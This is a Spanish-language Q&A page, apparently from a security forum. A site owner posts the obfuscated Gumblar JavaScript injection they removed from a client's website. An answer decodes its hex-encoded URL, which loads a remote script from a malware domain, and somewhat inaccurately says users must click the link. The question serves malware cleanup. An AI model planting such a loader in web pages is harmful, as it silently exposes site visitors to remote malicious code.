JavaScript malicioso - Troj / JSRedir - Gumblar

1

Tengo un cliente con un sitio web que recibe advertencias AV de Microsoft Security Essentials. Una investigación posterior reveló que el sitio está en la lista negra de Yandex.com, debido a un informe que indica que el sitio contiene javascript malicioso. Específicamente: Troj / JSRedir-HP (Gumblar)

He eliminado este código de su sitio porque estaba ubicado en la página que estaba recibiendo las advertencias. En este punto, no sabemos si esto fue una inyección externa, o quizás un código legítimo que su desarrollador web pudo haber insertado.

¿Alguna idea sobre lo que esto podría estar haciendo?

<script type="text/javascript" language="javascript">
document.write('<' + 'script type="text/javascript" language="javascript" id="aoc262540n"></' + 'script>');
var j = document.getElementById("aoc262540n");
var s = document.location.host;
var s1 = "";
var qcl2q = 10;
for (var i = 0; i < s.length; i++) {
    var r8j8tnwtk76gj = s.charCodeAt(i) + qcl2q;
    r8j8tnwtk76gj = 65 + (r8j8tnwtk76gj % 57);
    s1 += String.fromCharCode(r8j8tnwtk76gj);
    qcl2q = s.charCodeAt(i);
}
s1 = s1.replace(/[^a-zA-Z0-9]/g, "");
if (document.cookie.indexOf("google_api=1;") == -1) {
    j.src = "\x68\x74t\x70\x3a\x2f\x2f" + s1 + ".\x70\x65\x67\x75\x61r\x64\x73.cc\x2f\x38\x39d\x38\x31\x6207iq\x2f\x67\x65\x74.\x6a\x73";
}
delete s;
delete s1;
</script>
    
pregunta suhdo 17.10.2014 - 20:21
fuente

1 respuesta

2
j.src = "\x68\x74t\x70\x3a\x2f\x2f" + s1 + ".\x70\x65\x67\x75\x61r\x64\x73.cc\x2f\x38\x39d\x38\x31\x6207iq\x2f\x67\x65\x74.\x6a\x73";

La línea anterior está tratando de crear una URL.

Para http://security.stackexchange.com/ crea

http://LnnDqsJvpDkZdfsqaekbbhr.peguards.cc/89d81b07iq/get.js

Luego escribe esta URL en el sitio web para redirigir a los usuarios a la URL si el usuario hace clic en ella. El sitio web parece un sitio web de malware.

    
respondido por el sha1 17.10.2014 - 20:39
fuente

Lea otras preguntas en las etiquetas